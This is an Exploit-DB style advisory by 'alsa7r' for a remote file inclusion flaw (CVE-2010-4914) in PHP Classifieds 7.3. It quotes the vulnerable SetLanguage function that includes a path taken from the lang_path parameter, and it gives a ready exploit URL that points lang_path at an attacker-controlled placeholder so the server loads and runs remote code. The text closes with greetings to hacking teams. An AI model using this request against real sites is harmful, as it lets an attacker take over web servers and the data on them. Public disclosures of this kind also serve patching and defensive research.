PHP Classifieds 7.3 - Remote File Inclusion

Author: alsa7r
type: webapps
platform: php
port: 
date_added: 2010-09-04 
date_updated: 2010-09-04 
verified: 0 
codes: CVE-2010-4914;OSVDB-76202 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpclassifieds7_3.zip

==================================
  PHP Classifieds v7.3 RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE          : 09 September 2010
[x] AutH0r        : alsa7r
[x] Contact       : TBT9@hotmail.com
[x] TestEd 0n     : windows 7
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
 function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
    	//echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
        if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
            include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
        else if(file_exists($lang_path.'phpmailer.lang-en.php'))
            include($lang_path.'phpmailer.lang-en.php');
        else
    }
==========================================================================================

==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================

============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================

=====================
TBT9[at]hotmail[dot]com
=====================